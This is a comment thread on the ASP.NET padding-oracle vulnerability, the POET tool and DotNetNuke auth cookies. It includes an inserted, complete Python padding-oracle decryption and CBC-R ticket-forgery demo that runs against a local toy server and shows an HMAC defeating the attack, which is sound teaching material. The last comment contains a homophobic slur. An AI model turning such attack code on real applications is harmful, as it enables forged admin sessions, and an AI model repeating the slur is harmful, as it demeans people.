So – assuming you have CustomErrors not set to “Off” and redirectMode set to “ResponseRewrite” – does this protect you from this vulnerability? Or is this irrelevant?
I have the following error when I write this function in Python:
Traceback (most recent call last):
Can anyone please let me know the site for poet.py … I tried the jar file for the same but it’s not working. I want to give it a try in Python. Immediate help would be great.
@MrPrahalath See section D. of the RFP policy and compare to MSRC: weird response, followed by months of no fix. Guess why people aren’t complying? See statements from Veracode researchers etc. as well.
@randomgeocacher
The old hacker opinion seems to be: “Let’s screw it up so that SOMEONE ELSE CAN HANDLE IT BETTER in the future.”
0-Day:
No matter what form 0-Day takes (…if ever), it will inevitably consist of many, many tiny “SOMEONE ELSE WILL HANDLE IT” moments. This can be seen in explosions and wars and other areas where people are afraid.
Since the internet is the internet only because everyone is using it, a person is either a part of the problem or a part of the solution.
@MrPrahalath Papers published since 2002 define this class of vulnerabilities. 8 years would satisfy “due time” for crypto vendors to remedy the Padding Oracle attack?
And CBC-R works because ASP.NET does Encrypt-Without-MAC, which you have to go back to medieval times for people not to know is a vulnerability.
Microsoft failed in many ways here.
I don’t know when or if MSRC was notified; it is interesting that ASP.NET was omitted in the first papers by these guys. Was this really “0-day”?
@wydok
<authentication mode="Forms">
  <forms name=".DOTNETNUKE" protection="All" timeout="120" cookieless="UseCookies" />
</authentication>
If you browse the source code, you can easily determine what they have put in the auth cookie.
If it had been closed source, you could achieve the same with reflection (or simply by copying the cookie into an app which decrypts it with the key).
Basically, ASP.NET Form Auth cookies are 100% f*cked once your keys are in the hands of the bad guys.
@wydok ASP.NET Form Authentication works that way. Regardless of what we might think about it, it is a design decision of Microsoft, DotNetNuke is just following “the standard way to do it”.
Why would anyone save information about a user’s login name or security access in a cookie? This should be set in the Session object instead. That way the only cookie set is the cookie that is the ASP.NET Session ID.
Okay, so this POET tool uses a bug in ASP.NET in how it handles padding, and uses a brute-force method to send multiple requests to an ASP.NET website until it gets a correct response and is able to use that to find the encryption key.
But how does POET then use that key to determine the proper cookie to set to give a user admin privileges? Is it based on the concept that DotNetNuke uses a specific username as the superuser?
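The comment above about CBC-R working because ASP.NET does Encrypt-Without-MAC, and the question about how POET turns oracle responses into an admin cookie, both come down to the same mechanism, so here is one worked example (added here; it is not code from the page, from POET, or from ASP.NET/DotNetNuke). Everything in it is an assumption for illustration: `TicketServer` stands in for an application that encrypts a Forms-auth-style ticket under a secret key and answers differently when the padding is bad; the 16-byte block cipher is a 4-round Feistel network over HMAC-SHA256 so the file needs only the standard library (the attack never looks inside the cipher, so any block cipher would behave the same); the ticket strings `user=alice;role=member` and `user=host;role=admin` are made up. The oracle never reveals the key. It recovers the plaintext of the issued ticket one byte at a time, and `cbcr_encrypt` then builds a fresh `iv||ciphertext` for any plaintext the attacker chooses (CBC-R), which the server decrypts and accepts. The same server with `mac=True` checks an HMAC tag before decrypting, so every tampered token gets the same answer and the attack finds nothing to exploit.

```python
"""Padding-oracle decryption and CBC-R forgery against a CBC ticket with no MAC.
Assumed stand-in for the vulnerable design discussed above; not the page's code."""
import hashlib
import hmac
import os

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Feistel round function: HMAC-SHA256 truncated to one 8-byte half-block
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r


def pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable failure is the leak
    return data[:-n]


def cbc(key: bytes, iv: bytes, data: bytes, encrypt: bool) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        if encrypt:
            prev = block_encrypt(key, xor(blk, prev))
            out += prev
        else:
            out += xor(block_decrypt(key, blk), prev)
            prev = blk
    return out


class TicketServer:
    """Issues iv||CBC(ticket). mac=False is encrypt-without-MAC (vulnerable);
    mac=True appends an HMAC tag that is verified before any decryption."""

    def __init__(self, mac: bool):
        self.key, self.mac_key, self.mac = os.urandom(32), os.urandom(32), mac

    def issue(self, ticket: bytes) -> bytes:
        iv = os.urandom(BLOCK)
        token = iv + cbc(self.key, iv, pad(ticket), True)
        if self.mac:
            token += hmac.new(self.mac_key, token, hashlib.sha256).digest()
        return token

    def read(self, token: bytes) -> bytes:
        if self.mac:
            token, tag = token[:-32], token[-32:]
            if not hmac.compare_digest(tag, hmac.new(self.mac_key, token, hashlib.sha256).digest()):
                raise ValueError("bad tag")
        return unpad(cbc(self.key, token[:BLOCK], token[BLOCK:], False))

    def oracle(self, token: bytes) -> bool:
        """All the attacker observes: was the token accepted or rejected?"""
        try:
            self.read(token)
            return True
        except ValueError:
            return False


def recover_intermediate(oracle, blk: bytes) -> bytes:
    """Recover block_decrypt(key, blk) using only accept/reject answers."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        want = BLOCK - pos  # padding value we force on the already-known tail
        probe = bytearray(inter[j] ^ want if j > pos else 0 for j in range(BLOCK))
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe) + blk):
                continue
            if pos == BLOCK - 1:  # rule out an accidental 0x02 0x02 (etc.) acceptance
                probe[pos - 1] ^= 0xFF
                ok = oracle(bytes(probe) + blk)
                probe[pos - 1] ^= 0xFF
                if not ok:
                    continue
            inter[pos] = guess ^ want
            break
        else:
            raise RuntimeError("oracle never accepted: no padding leak to exploit")
    return bytes(inter)


def oracle_decrypt(oracle, token: bytes) -> bytes:
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plain = b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:]))
    return unpad(plain)


def cbcr_encrypt(oracle, plaintext: bytes) -> bytes:
    """CBC-R: pick the last block freely, then choose each earlier block so that
    block_decrypt(cur) XOR prev equals the wanted plaintext block. No key needed."""
    padded = pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    forged = [bytes(BLOCK)]
    for p in reversed(blocks):
        forged.insert(0, xor(recover_intermediate(oracle, forged[0]), p))
    return b"".join(forged)


def demo(mac: bool) -> dict:
    server = TicketServer(mac)
    token = server.issue(b"user=alice;role=member")  # constructed sample ticket
    try:
        leaked = oracle_decrypt(server.oracle, token)
        forged = cbcr_encrypt(server.oracle, b"user=host;role=admin")  # made-up target
        return {"leaked": leaked, "forged_accepted_as": server.read(forged)}
    except RuntimeError as err:
        return {"error": str(err)}


if __name__ == "__main__":
    print(demo(mac=False))
    print(demo(mac=True))
```

Each recovered block costs at most 256 oracle queries per byte, which is the "multiple requests" the question above refers to; the key itself is never needed, because `recover_intermediate` learns only the per-block decryption output and CBC-R chains those outputs backwards into a valid ciphertext for a ticket the attacker wrote. What plaintext a particular application would need in that ticket depends on what it stores in the cookie, which is why the comment above suggests reading the source.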
This is completely stupid!!!!
and has nothing to do with ASP.NET.
@coreyogburn Nothing in this world is perfect. This is something we all know. You can buy the most expensive car in the world and it *will* come with some imperfection. This is a fact. Timing and the order in which one does something is also an important factor in getting things right.
@coreyogburn momentary fame: This particular software “bug”, or whatever you guys call it, was exposed to the public *before* the relevant authorities were notified about it. This was the real security risk IMO, with video instructions on YouTube on how to go about breaking into an ASP.NET installation.
What part of this problem can cryptbe accept responsibility for? He just went “oops…” while everyone else was scrambling desperately to find a solution to the problem.
@MrPrahalath If this guy doesn’t find the problem and work towards fixing it, then somebody else will find the problem and work towards exploiting it. I hate to put words in your mouth, but it sounds like you’re saying “don’t look for a problem, focus on more important things.” With a foundation as widely accepted as ASP.Net, the problem is the important thing and it does need to be fixed.
OMG guys, this is absolutely perfect, I can’t say anything else, but congratulations!
@MrPrahalath That’s how security research progresses. This is good work.
The things people do for momentary fame. Get a life. Don’t you people have anything better to do than threatening the whole world? You guys have some serious skillz that could definitely be put to better use.
cryptbe, you and the hoax artists that presented this at ekoparty and made this video are clowns. Anyone who knows ASP.NET and DNN knows you rigged this for breakage. Your video shows plainly that the setup not only doesn’t follow best practices, but doesn’t even have the default DNN install protections in place. Quit claiming the MS work-around won’t work, and PROVE it.
fag. get rid of the gay music and maybe ill watch instead of thumbs down 5 seconds in.